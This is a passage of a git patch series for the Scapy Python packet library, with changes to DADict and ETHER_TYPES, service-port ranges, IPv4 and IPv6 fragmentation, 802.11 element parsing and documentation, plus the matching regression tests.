"-3"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out2, std_err2 = result.communicate() except Exception as e: print(e) - tester.send(b"\x01\xff\xff\xff\xff") - sim.join(timeout=10) - raise e finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) - + assert std_err1 == b'' and std_err2 == b'' + expected_output = ["256 requests were sent", "1 requests were sent, 1 answered"] + for out in expected_output: + assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) + Cleanup From bfd9c52af61978ac872d3c0bf5eef81168d88ca9 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Fri, 12 Jun 2020 12:49:57 +0200 Subject: [PATCH 0200/1632] Fix DADict (#2674) * DADict full refactor * Fix load_services to handle ranges * suggestion --- scapy/asn1/mib.py | 6 +- scapy/contrib/ife.py | 2 +- scapy/contrib/lacp.py | 2 +- scapy/contrib/lldp.py | 2 +- scapy/contrib/mac_control.py | 2 +- scapy/dadict.py | 124 +++++++++++++++++------------------ scapy/data.py | 72 ++++++++++++++++---- scapy/fields.py | 4 +- scapy/layers/l2.py | 4 +- test/regression.uts | 68 ++++++++++++------- 10 files changed, 171 insertions(+), 115 deletions(-) diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index b2fa4d0cf3c..c89c21a6d15 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -29,10 +29,6 @@ class MIBDict(DADict): - def fixname(self, val): - # We overwrite DADict fixname method as we want to keep - in names - return val - def _findroot(self, x): """Internal MIBDict function used to find a partial OID""" if x.startswith("."): @@ -546,7 +542,7 @@ def load_mib(filenames): # policies # certPolicy_oids = { - "anyPolicy": "2.5.29.32.0" + "2.5.29.32.0": "anyPolicy" } # from Chromium source code (ev_root_ca_metadata.cc) diff --git a/scapy/contrib/ife.py b/scapy/contrib/ife.py index ad28d7bef8f..3603b61ac37 100644 --- a/scapy/contrib/ife.py +++ b/scapy/contrib/ife.py @@ -38,7 +38,7 @@ from scapy.layers.l2 import Ether ETH_P_IFE = 0xed3e -ETHER_TYPES['IFE'] = ETH_P_IFE +ETHER_TYPES[ETH_P_IFE] = 'IFE' # The value to set for the skb mark. IFE_META_SKBMARK = 0x0001 diff --git a/scapy/contrib/lacp.py b/scapy/contrib/lacp.py index 3d63f96921f..16fd71aac4b 100644 --- a/scapy/contrib/lacp.py +++ b/scapy/contrib/lacp.py @@ -21,7 +21,7 @@ from scapy.data import ETHER_TYPES -ETHER_TYPES['SlowProtocol'] = 0x8809 +ETHER_TYPES[0x8809] = 'SlowProtocol' SLOW_SUB_TYPES = { 'Unused': 0, 'LACP': 1, diff --git a/scapy/contrib/lldp.py b/scapy/contrib/lldp.py index e3285327af6..e6291f1bff4 100644 --- a/scapy/contrib/lldp.py +++ b/scapy/contrib/lldp.py @@ -60,7 +60,7 @@ LLDP_NEAREST_CUSTOMER_BRIDGE_MAC = '01:80:c2:00:00:00' LLDP_ETHER_TYPE = 0x88cc -ETHER_TYPES['LLDP'] = LLDP_ETHER_TYPE +ETHER_TYPES[LLDP_ETHER_TYPE] = 'LLDP' class LLDPInvalidFrameStructure(Scapy_Exception): diff --git a/scapy/contrib/mac_control.py b/scapy/contrib/mac_control.py index bed2e0d7776..a213dbeeeb1 100644 --- a/scapy/contrib/mac_control.py +++ b/scapy/contrib/mac_control.py @@ -45,7 +45,7 @@ from scapy.layers.l2 import Ether, Dot1Q, bind_layers MAC_CONTROL_ETHER_TYPE = 0x8808 -ETHER_TYPES['MAC_CONTROL'] = MAC_CONTROL_ETHER_TYPE +ETHER_TYPES[MAC_CONTROL_ETHER_TYPE] = 'MAC_CONTROL' ETHER_SPEED_MBIT_10 = 0x01 ETHER_SPEED_MBIT_100 = 0x02 diff --git a/scapy/dadict.py b/scapy/dadict.py index d1b2bc259fc..5489890547d 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -19,6 +19,10 @@ def fixname(x): + """ + Modifies a string to make sure it can be used as an attribute name. + """ + x = plain_str(x) if x and str(x[0]) in "0123456789": x = "n_" + x return x.translate( @@ -34,89 +38,81 @@ class DADict_Exception(Scapy_Exception): pass -class DADict: - def __init__(self, _name="DADict", **kargs): - self._name = _name - self.update(kargs) - - def fixname(self, val): - return fixname(plain_str(val)) +class DADict(object): + """ + Direct Access Dictionary - def __contains__(self, val): - return val in self.__dict__ + This acts like a dict, but it provides a direct attribute access + to its keys through its values. This is used to store protocols, + manuf... - def __getitem__(self, attr): - return getattr(self, attr) + For instance, scapy fields will use a DADict as an enum:: - def __setitem__(self, attr, val): - return setattr(self, self.fixname(attr), val) + ETHER_TYPES[2048] -> IPv4 - def __iter__(self): - return (value for key, value in six.iteritems(self.__dict__) - if key and key[0] != '_') + Whereas humans can access:: - def _show(self): - for k in self.__dict__: - if k and k[0] != "_": - print("%10s = %r" % (k, getattr(self, k))) - - def __repr__(self): - return "<%s - %s elements>" % (self._name, len(self.__dict__)) - - def _branch(self, br, uniq=0): - if uniq and br._name in self: - raise DADict_Exception("DADict: [%s] already branched in [%s]" % (br._name, self._name)) # noqa: E501 - self[br._name] = br + ETHER_TYPES.IPv4 -> 2048 + """ + def __init__(self, _name="DADict", **kargs): + self._name = _name + self.update(kargs) - def _my_find(self, *args, **kargs): - if args and self._name not in args: - return False - return all(k in self and self[k] == v for k, v in six.iteritems(kargs)) + def ident(self, v): + """ + Return value that is used as key for the direct access + """ + return fixname(v) def update(self, *args, **kwargs): for k, v in six.iteritems(dict(*args, **kwargs)): self[k] = v - def _find(self, *args, **kargs): - return self._recurs_find((), *args, **kargs) - - def _recurs_find(self, path, *args, **kargs): - if self in path: - return None - if self._my_find(*args, **kargs): - return self - for o in self: - if isinstance(o, DADict): - p = o._recurs_find(path + (self,), *args, **kargs) - if p is not None: - return p - return None - - def _find_all(self, *args, **kargs): - return self._recurs_find_all((), *args, **kargs) - - def _recurs_find_all(self, path, *args, **kargs): - r = [] - if self in path: - return r - if self._my_find(*args, **kargs): - r.append(self) - for o in self: - if isinstance(o, DADict): - p = o._recurs_find_all(path + (self,), *args, **kargs) - r += p - return r + def iterkeys(self): + for x in six.iterkeys(self.__dict__): + if not isinstance(x, str) or x[0] != "_": + yield x def keys(self): return list(self.iterkeys()) - def iterkeys(self): - return (x for x in self.__dict__ if x and x[0] != "_") + def __iter__(self): + return self.iterkeys() + + def itervalues(self): + return six.itervalues(self.__dict__) + + def values(self): + return list(self.itervalues()) + + def _show(self): + for k in self.iterkeys(): + print("%10s = %r" % (k, self[k])) + + def __repr__(self): + return "<%s - %s elements>" % (self._name, len(self)) + + def __getitem__(self, attr): + return self.__dict__[attr] + + def __setitem__(self, attr, val): + self.__dict__[attr] = val def __len__(self): return len(self.__dict__) def __nonzero__(self): # Always has at least its name - return len(self.__dict__) > 1 + return len(self) > 1 __bool__ = __nonzero__ + + def __getattr__(self, attr): + try: + return object.__getattribute__(self, attr) + except AttributeError: + for k, v in six.iteritems(self.__dict__): + if self.ident(v) == attr: + return k + + def __dir__(self): + return [self.ident(x) for x in self.itervalues()] diff --git a/scapy/data.py b/scapy/data.py index 632bc0231a9..9279012269a 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -10,9 +10,10 @@ import calendar import os import re +import warnings -from scapy.dadict import DADict +from scapy.dadict import DADict, fixname from scapy.consts import FREEBSD, NETBSD, OPENBSD, WINDOWS from scapy.error import log_loading from scapy.compat import plain_str @@ -272,10 +273,10 @@ } -def load_protocols(filename, _fallback=None, _integer_base=10): +def load_protocols(filename, _fallback=None, _integer_base=10, _cls=DADict): """"Parse /etc/protocols and return values as a dictionary.""" spaces = re.compile(b"[ \t]+|\n") - dct = DADict(_name=filename) + dct = _cls(_name=filename) def _process_data(fdesc): for line in fdesc: @@ -289,7 +290,7 @@ def _process_data(fdesc): lt = tuple(re.split(spaces, line)) if len(lt) < 2 or not lt[0]: continue - dct[lt[0]] = int(lt[1], _integer_base) + dct[int(lt[1], _integer_base)] = fixname(lt[0]) except Exception as e: log_loading.info( "Couldn't parse file [%s]: line [%r] (%s)", @@ -310,11 +311,36 @@ def _process_data(fdesc): return dct +class EtherDA(DADict): + # Backward compatibility: accept + # ETHER_TYPES["MY_GREAT_TYPE"] = 12 + def __setitem__(self, attr, val): + if isinstance(attr, str): + attr, val = val, attr + warnings.warn( + "ETHER_TYPES now uses the integer value as key !", + DeprecationWarning + ) + super(EtherDA, self).__setitem__(attr, val) + + def __getitem__(self, attr): + if isinstance(attr, str): + warnings.warn( + "Please use 'ETHER_TYPES.%s'" % attr, + DeprecationWarning + ) + return super(EtherDA, self).__getattr__(attr) + return super(EtherDA, self).__getitem__(attr) + + def load_ethertypes(filename): """"Parse /etc/ethertypes and return values as a dictionary. If unavailable, use the copy bundled with Scapy.""" from scapy.libs.ethertypes import DATA - return load_protocols(filename, _fallback=DATA, _integer_base=16) + return load_protocols(filename or "Scapy's backup ETHER_TYPES", + _fallback=DATA, + _integer_base=16, + _cls=EtherDA) def load_services(filename): @@ -334,10 +360,21 @@ def load_services(filename): lt = tuple(re.split(spaces, line)) if len(lt) < 2 or not lt[0]: continue + dtct = None if lt[1].endswith(b"/tcp"): - tdct[lt[0]] = int(lt[1].split(b'/')[0]) + dtct = tdct elif lt[1].endswith(b"/udp"): - udct[lt[0]] = int(lt[1].split(b'/')[0]) + dtct = udct + else: + continue + port = lt[1].split(b'/')[0] + name = fixname(lt[0]) + if b"-" in port: + sport, eport = port.split(b"-") + for i in range(int(sport), int(eport) + 1): + dtct[i] = name + else: + dtct[int(port)] = name except Exception as e: log_loading.warning( "Couldn't parse file [%s]: line [%r] (%s)", @@ -351,11 +388,8 @@ def load_services(filename): class ManufDA(DADict): - def fixname(self, val): - return plain_str(val) - - def __dir__(self): - return ["lookup", "reverse_lookup"] + def ident(self, v): + return fixname(v[0] if isinstance(v, tuple) else v) def _get_manuf_couple(self, mac): oui = ":".join(mac.split(":")[:3]).upper() @@ -394,6 +428,15 @@ def reverse_lookup(self, name, case_sensitive=False): return {k: v for k, v in six.iteritems(self.__dict__) if filtr(name, v)} + def __dir__(self): + return [ + "_get_manuf", + "_get_short_manuf", + "_resolve_MAC", + "loopkup", + "reverse_lookup", + ] + super(ManufDA, self).__dir__() + def load_manuf(filename): """ @@ -410,9 +453,10 @@ def load_manuf(filename): if not line or line.startswith(b"#"): continue parts = line.split(None, 2) - oui, shrt = parts[:2] - lng = parts[2].lstrip(b"#").strip() if len(parts) > 2 else "" + ouib, shrt = parts[:2] + lng = parts[2].lstrip(b"#").strip() if len(parts) > 2 else b"" lng = lng or shrt + oui = plain_str(ouib) manufdb[oui] = plain_str(shrt), plain_str(lng) except Exception: log_loading.warning("Couldn't parse one line from [%s] [%r]", diff --git a/scapy/fields.py b/scapy/fields.py index b9f392ef398..35344353503 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1726,8 +1726,8 @@ def __init__(self, name, default, enum, fmt="H"): keys = enum.keys() else: keys = list(enum) - if any(isinstance(x, str) for x in keys): - i2s, s2i = s2i, i2s + if any(isinstance(x, str) for x in keys): + i2s, s2i = s2i, i2s for k in keys: i2s[k] = enum[k] s2i[enum[k]] = k diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 358a15e0b7d..0bde516b8f6 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -157,8 +157,8 @@ def i2m(self, pkt, x): # Layers -ETHER_TYPES['802_AD'] = 0x88a8 -ETHER_TYPES['802_1AE'] = ETH_P_MACSEC +ETHER_TYPES[0x88a8] = '802_AD' +ETHER_TYPES[ETH_P_MACSEC] = '802_1AE' class Ether(Packet): diff --git a/test/regression.uts b/test/regression.uts index 4b8db615f53..d499224723a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -684,6 +684,29 @@ b.reverse_lookup("Secdevcorp") == {'00:01:12': ('SecdevCorp', 'Secdev Corporatio scapy_delete_temp_files() += Test load_services + +data_services = """ +cvsup 5999/udp # CVSup +x11 6000-6063/tcp # X Window System +x11 6000-6063/udp # X Window System +ndl-ahp-svc 6064/tcp # NDL-AHP-SVC +""" + +services = get_temp_file() +with open(services, "w") as w: + w.write(data_services) + +tcp, udp = load_services(services) +assert tcp[6002] == "x11" +assert tcp.ndl_ahp_svc == 6064 +assert tcp.x11 in range(6000, 6093) +assert udp[6002] == "x11" +assert udp.x11 in range(6000, 6093) +assert udp.cvsup == 5999 + +scapy_delete_temp_files() + = Test ARPingResult output ~ manufdb @@ -12222,12 +12245,6 @@ assert(sum(1 for k in six.itervalues(conf.mib.__dict__) if "scapy" in k) == 1) assert(sum(1 for oid in conf.mib) > 100) -assert(conf.mib._my_find("MIB", "keyUsage")) - -assert(len(conf.mib._find("MIB", "keyUsage"))) - -assert(len(conf.mib._recurs_find_all((), "MIB", "keyUsage"))) - = MIB - graph ~ mib @@ -12252,31 +12269,34 @@ assert conf.mib._oidname("2.5.29.19") == "basicConstraints" = DADict tests a = DADict("test") -a.test_value = "scapy" +a[0] = "test_value1" +a["scapy"] = "test_value2" + +assert a.test_value1 == 0 +assert a.test_value2 == "scapy" + with ContextManagerCaptureOutput() as cmco: a._show() - assert(cmco.get_output() == "test_value = 'scapy'\n") + outp = cmco.get_output() + +assert "scapy = 'test_value2'" in outp +assert "0 = 'test_value1'" in outp -b = DADict("test2") -b.test_value_2 = "hello_world" += Test ETHER_TYPES -a._branch(b, 1) +assert ETHER_TYPES.IPv4 == 2048 try: - a._branch(b, 1) - assert False -except DADict_Exception: + import warnings + + with warnings.catch_warnings(record=True) as w: + warnings.simplefilter("always") + ETHER_TYPES["BAOBAB"] = 0xffff + assert ETHER_TYPES.BAOBAB == 0xffff + assert issubclass(w[-1].category, DeprecationWarning) +except DeprecationWarning: + # -Werror is used pass -assert(len(a._find("test2"))) - -assert(len(a._find(test_value_2="hello_world"))) - -assert(len(a._find_all("test2"))) - -assert(not a._recurs_find((a,))) - -assert(not a._recurs_find_all((a,))) - = BER tests BER_id_enc(42) == '*' From f2a111e6d4821c199a0cf5f42bc5bb5dcbe6ff04 Mon Sep 17 00:00:00 2001 From: scottwedge Date: Fri, 12 Jun 2020 13:57:43 -0400 Subject: [PATCH 0201/1632] Fixes #2678 (#2679) --- scapy/packet.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/packet.py b/scapy/packet.py index 3f2c3d7baa0..9e90125565a 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1027,7 +1027,7 @@ def is_valid_gen_tuple(x): return length def iterpayloads(self): - """Used to iter through the paylods of a Packet. + """Used to iter through the payloads of a Packet. Useful for DNS or 802.11 for instance. """ yield self From 123c0bbbc8231d518cb5e07cd4b5d7089a6b65e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Micha=C5=82=20Miros=C5=82aw?= Date: Wed, 3 Jun 2020 18:48:45 +0200 Subject: [PATCH 0202/1632] IPv6: make fragment6() insert FragmentHeader Teach fragment6() a new trick. For packets already containing the fragment header nothing changes. For packets with IPv6 layer, fragment header is always added. --- scapy/layers/inet6.py | 28 +++++++++++++++++++--------- test/regression.uts | 4 ++++ 2 files changed, 23 insertions(+), 9 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 3c61e6db160..797651ad700 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1090,21 +1090,31 @@ def defragment6(packets): def fragment6(pkt, fragSize): """ - Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must - already contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the - expected maximum size of fragments (MTU). The list of packets is returned. + Performs fragmentation of an IPv6 packet. 'fragSize' argument is the + expected maximum size of fragment data (MTU). The list of packets is + returned. - If packet does not contain an IPv6ExtHdrFragment class, it is returned in - result list. + If packet does not contain an IPv6ExtHdrFragment class, it is added to + first IPv6 layer found. If no IPv6 layer exists packet is returned in + result list unmodified. """ pkt = pkt.copy() if IPv6ExtHdrFragment not in pkt: - # TODO : automatically add a fragment before upper Layer - # at the moment, we do nothing and return initial packet - # as single element of a list - return [pkt] + if IPv6 not in pkt: + return [pkt] + + layer3 = pkt[IPv6] + data = layer3.payload + frag = IPv6ExtHdrFragment(nh=layer3.nh) + + layer3.remove_payload() + del(layer3.nh) + del(layer3.plen) + + frag.add_payload(data) + layer3.add_payload(frag) # If the payload is bigger than 65535, a Jumbo payload must be used, as # an IPv6 packet can't be bigger than 65535 bytes. diff --git a/test/regression.uts b/test/regression.uts index f6f64f17d63..aa42529a590 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4061,6 +4061,10 @@ a.nh == 0xff and a.res1 == 0xee and a.offset==0x1fff and a.res2==1 and a.m == 1 l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) len(l) == 33 and len(raw(l[-1])) == 644 += fragment6 - test against a long TCP packet with a 1280 MTU without fragment header +l=fragment6(IPv6()/TCP()/Raw(load="A"*40000), 1280) +len(l) == 33 and len(raw(l[-1])) == 644 + ############ ############ From 54bad63433188e196cc4c12b1689b98d1578d205 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Micha=C5=82=20Miros=C5=82aw?= Date: Fri, 12 Jan 2018 13:41:25 +0100 Subject: [PATCH 0203/1632] ipsec: add missing SecurityAssociation.scrypt_salt field for 'NULL' cipher Change-Id: Ib89b24cf6910d73cb3ee759ca40c0eb5603e83df --- scapy/layers/ipsec.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index ae057ee1553..254223b67fd 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -840,6 +840,7 @@ def __init__(self, proto, spi, seq_num=1, crypt_algo=None, crypt_key=None, else: self.crypt_algo = CRYPT_ALGOS['NULL'] self.crypt_key = None + self.crypt_salt = None if auth_algo: if auth_algo not in AUTH_ALGOS: From c98acb96464c0cf00f86991a4ed0be6b52d5ac3f Mon Sep 17 00:00:00 2001 From: Gilad Beeri Date: Tue, 16 Jun 2020 14:21:27 +0300 Subject: [PATCH 0204/1632] don't override SSID values after the SSID was set don't override SSID values after the SSID was already set, in order to overcome parsing bugs in other elements that override the SSID, see https://github.com/secdev/scapy/issues/2683. Resolves https://github.com/secdev/scapy/issues/2684 --- scapy/layers/dot11.py | 5 ++++- .../pcaps/bad_rsn_parsing_overrides_ssid.pcap | Bin 0 -> 360 bytes test/regression.uts | 21 ++++++++++++++++++ 3 files changed, 25 insertions(+), 1 deletion(-) create mode 100644 test/pcaps/bad_rsn_parsing_overrides_ssid.pcap diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 020f4f7468e..503eeb517e1 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -604,7 +604,10 @@ def network_stats(self): crypto = set() p = self.payload while isinstance(p, Dot11Elt): - if p.ID == 0: + # Avoid overriding already-set SSID values because it is not part + # of the standard and it protects from parsing bugs, + # see https://github.com/secdev/scapy/issues/2683 + if p.ID == 0 and "ssid" not in summary: summary["ssid"] = plain_str(p.info) elif p.ID == 3: summary["channel"] = ord(p.info) diff --git a/test/pcaps/bad_rsn_parsing_overrides_ssid.pcap b/test/pcaps/bad_rsn_parsing_overrides_ssid.pcap new file mode 100644 index 0000000000000000000000000000000000000000..ce764004a46ad598ddf312ceca014e0a5d1c6643 GIT binary patch literal 360 zcmca|c+)~A1{MYcU}2~Sa#nBM6t_r`jlrIg0gM?K3>fqs7#1jSz%f`0cR^;Jwdz|x z0iGPr0}SVYVw)KDGM-~<0J8pr!5eY?COJ(ADNxXuxR3*+F@?d9g@HH7KQzQu*TTrq z)yUG6k+FxFk&%^!fr){EUB%N!fss*!iBW`^QG|t2gq2Z*jZuW1QG|n0gp*N(i&2D| zQN&s(Ffb@Mq`0KCth}PKs=BtWzCnwT!9WV=X#O=UNF-Aa$Ws0_Y`RjtjPn2ggLoLg zR*aEB6hoAO;jRQjz$Yd~#zqF_B@7JeK Date: Thu, 18 Jun 2020 20:21:40 +0200 Subject: [PATCH 0205/1632] Minor npcap doc change --- doc/scapy/troubleshooting.rst | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/doc/scapy/troubleshooting.rst b/doc/scapy/troubleshooting.rst index e094e6bd68a..82403c09efe 100644 --- a/doc/scapy/troubleshooting.rst +++ b/doc/scapy/troubleshooting.rst @@ -10,12 +10,14 @@ I can't sniff/inject packets in monitor mode. The use monitor mode varies greatly depending on the platform. -- **Windows or *BSD or ``conf.use_pcap = True``** +- **Windows or *BSD or conf.use_pcap = True** ``libpcap`` must be called differently by Scapy in order for it to create the sockets in monitor mode. You will need to pass the ``monitor=True`` to any calls that open a socket (``send``, ``sniff``...) or to a Scapy socket that you create yourself (``conf.L2Socket``...) - **Native Linux (with pcap disabled):** You should set the interface in monitor mode on your own. Scapy provides utilitary functions: ``set_iface_monitor`` and ``get_iface_mode`` (linux only), that may be used (they do system calls to ``iwconfig`` and will restart the adapter). -Note that many adapters do not support monitor mode, especially on Windows, or may incorrectly report the headers. See `the Wireshark doc about this `_ +**If you are using Npcap:** please note that Npcap ``npcap-0.9983`` broke the 802.11 util back in 2019. It has yet to be fixed (as of Npcap 0.9994) so in the meantime, use `npcap-0.9982.exe `_ + +.. note:: many adapters do not support monitor mode, especially on Windows, or may incorrectly report the headers. See `the Wireshark doc about this `_ We make our best to make this work, if your adapter works with Wireshark for instance, but not with Scapy, feel free to report an issue. From 0bda5c9841403b42e5d3983639a2f3b71d094ced Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Fri, 19 Jun 2020 09:33:54 +0200 Subject: [PATCH 0206/1632] Fix Windows w/o IPv6 (wrong exception expected) --- scapy/arch/windows/__init__.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index bd15abbcf84..614bd9ecf22 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -367,7 +367,7 @@ def update(self, data): pass try: self.ip6 = next(x for x in self.ips if ":" in x) - except IndexError: + except StopIteration: pass if not self.ip and not self.ip6: self.invalid = True From 572503eb088445dc641f0f2f570c7b1b61945235 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Micha=C5=82=20Miros=C5=82aw?= Date: Fri, 19 Jun 2020 19:51:43 +0200 Subject: [PATCH 0207/1632] inet: fix IPv4 fragmentation for non-multiply-of-8 fragsize Make fragment() obey both MTU limit and non-final fragment size restriction. Change-Id: Ib30175d1378ae90d284750a47385103bc74622de --- scapy/layers/inet.py | 24 ++++++++++++++++++------ test/regression.uts | 9 +++++++++ 2 files changed, 27 insertions(+), 6 deletions(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index b583f06044e..891562d9b9c 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -552,7 +552,8 @@ def mysummary(self): def fragment(self, fragsize=1480): """Fragment IP datagrams""" - fragsize = (fragsize + 7) // 8 * 8 + lastfragsz = fragsize + fragsize -= fragsize % 8 lst = [] fnb = 0 fl = self @@ -562,7 +563,11 @@ def fragment(self, fragsize=1480): for p in fl: s = raw(p[fnb].payload) - nb = (len(s) + fragsize - 1) // fragsize + if len(s) <= lastfragsz: + lst.append(p) + continue + + nb = (len(s) - lastfragsz + fragsize - 1) // fragsize + 1 for i in range(nb): q = p.copy() del(q[fnb].payload) @@ -570,8 +575,11 @@ def fragment(self, fragsize=1480): del(q[fnb].len) if i != nb - 1: q[fnb].flags |= 1 + fragend = (i + 1) * fragsize + else: + fragend = i * fragsize + lastfragsz q[fnb].frag += i * fragsize // 8 - r = conf.raw_layer(load=s[i * fragsize:(i + 1) * fragsize]) + r = conf.raw_layer(load=s[i * fragsize:fragend]) r.overload_fields = p[fnb].payload.overload_fields.copy() q.add_payload(r) lst.append(q) @@ -978,11 +986,12 @@ def inet_register_l3(l2, l3): @conf.commands.register def fragment(pkt, fragsize=1480): """Fragment a big IP datagram""" - fragsize = (fragsize + 7) // 8 * 8 + lastfragsz = fragsize + fragsize -= fragsize % 8 lst = [] for p in pkt: s = raw(p[IP].payload) - nb = (len(s) + fragsize - 1) // fragsize + nb = (len(s) - lastfragsz + fragsize - 1) // fragsize + 1 for i in range(nb): q = p.copy() del(q[IP].payload) @@ -990,8 +999,11 @@ def fragment(pkt, fragsize=1480): del(q[IP].len) if i != nb - 1: q[IP].flags |= 1 + fragend = (i + 1) * fragsize + else: + fragend = i * fragsize + lastfragsz q[IP].frag += i * fragsize // 8 - r = conf.raw_layer(load=s[i * fragsize:(i + 1) * fragsize]) + r = conf.raw_layer(load=s[i * fragsize:fragend]) r.overload_fields = p[IP].payload.overload_fields.copy() q.add_payload(r) lst.append(q) diff --git a/test/regression.uts b/test/regression.uts index aa42529a590..efb44e71897 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7455,6 +7455,15 @@ for p in ffrags: assert plen == payloadlen += fragment() with non-multiple-of-8 MTU +paylen = 1400 + 1 +frags1 = fragment(IP() / ("X" * paylen), paylen) +assert len(frags1) == 1 +frags2 = fragment(IP() / ("X" * (paylen + 1)), paylen) +assert len(frags2) == 2 +assert len(frags2[0]) == 20 + paylen - paylen % 8 +assert len(frags2[1]) == 20 + 1 + paylen % 8 + = defrag() nonfrag, unfrag, badfrag = defrag(frags) assert not nonfrag From a3315fa9908b46e2a20c07e701fc487242ae17d1 Mon Sep 17 00:00:00 2001 From: "alexandre.tanem@orange.fr" Date: Thu, 18 Jun 2020 15:04:53 +0200 Subject: [PATCH 0208/1632] Default LEFieldLenField value set to None in Dot11 and fix bad count_of reference --- scapy/layers/dot11.py | 10 +++++----- test/regression.uts | 20 ++++++++++++++++++++ 2 files changed, 25 insertions(+), 5 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 503eeb517e1..89e9f48971d 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -830,7 +830,7 @@ def extract_padding(self, s): class PMKIDListPacket(Packet): name = "PMKIDs" fields_desc = [ - LEFieldLenField("nb_pmkids", 0, count_of="pmk_id_list"), + LEFieldLenField("nb_pmkids", None, count_of="pmkid_list"), FieldListField( "pmkid_list", None, @@ -853,7 +853,7 @@ class Dot11EltRSN(Dot11Elt): PacketField("group_cipher_suite", RSNCipherSuite(), RSNCipherSuite), LEFieldLenField( "nb_pairwise_cipher_suites", - 1, + None, count_of="pairwise_cipher_suites" ), PacketListField( @@ -864,7 +864,7 @@ class Dot11EltRSN(Dot11Elt): ), LEFieldLenField( "nb_akm_suites", - 1, + None, count_of="akm_suites" ), PacketListField( @@ -936,7 +936,7 @@ class Dot11EltMicrosoftWPA(Dot11Elt): PacketField("group_cipher_suite", RSNCipherSuite(), RSNCipherSuite), LEFieldLenField( "nb_pairwise_cipher_suites", - 1, + None, count_of="pairwise_cipher_suites" ), PacketListField( @@ -947,7 +947,7 @@ class Dot11EltMicrosoftWPA(Dot11Elt): ), LEFieldLenField( "nb_akm_suites", - 1, + None, count_of="akm_suites" ), PacketListField( diff --git a/test/regression.uts b/test/regression.uts index e059feadbb5..cc94f5ed5f6 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1315,6 +1315,26 @@ assert raw(pkt) == b'\x00\x00\x10\x00\x00\x00\x00\x80\x01\x10\x00\xa0\x01 \x00H' for i in range(10): assert isinstance(raw(fuzz(Dot11Elt())), bytes) += PMKIDListPacket - Check computation of nb_pmkids +assert PMKIDListPacket(raw(PMKIDListPacket())).nb_pmkids == 0 +assert PMKIDListPacket(raw(PMKIDListPacket(pmkid_list=["AZEDFREZSDERFGTY"]))).nb_pmkids == 1 +assert PMKIDListPacket(raw(PMKIDListPacket(pmkid_list=["0123456789ABDEFX", "AZEDFREZSDERFGTY"]))).nb_pmkids == 2 + += Dot11EltRSN - Check computation of nb_pairwise_cipher_suites and nb_akm_suites +assert Dot11EltRSN(raw(Dot11EltRSN())).nb_pairwise_cipher_suites == 1 +assert Dot11EltRSN(raw(Dot11EltRSN(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP")]))).nb_pairwise_cipher_suites == 1 +assert Dot11EltRSN(raw(Dot11EltRSN(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP"), RSNCipherSuite(cipher="CCMP")]))).nb_pairwise_cipher_suites == 2 +assert Dot11EltRSN(raw(Dot11EltRSN())).nb_akm_suites == 1 +assert Dot11EltRSN(raw(Dot11EltRSN(akm_suites=[AKMSuite(suite="PSK")]))).nb_akm_suites == 1 +assert Dot11EltRSN(raw(Dot11EltRSN(akm_suites=[AKMSuite(suite="PSK"), AKMSuite(suite="802.1X")]))).nb_akm_suites == 2 + += Dot11EltMicrosoftWPA - Check computation of nb_pairwise_cipher_suites and nb_akm_suites +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA())).nb_pairwise_cipher_suites == 1 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP")]))).nb_pairwise_cipher_suites == 1 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP"), RSNCipherSuite(cipher="CCMP")]))).nb_pairwise_cipher_suites == 2 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA())).nb_akm_suites == 1 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(akm_suites=[AKMSuite(suite="PSK")]))).nb_akm_suites == 1 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(akm_suites=[AKMSuite(suite="PSK"), 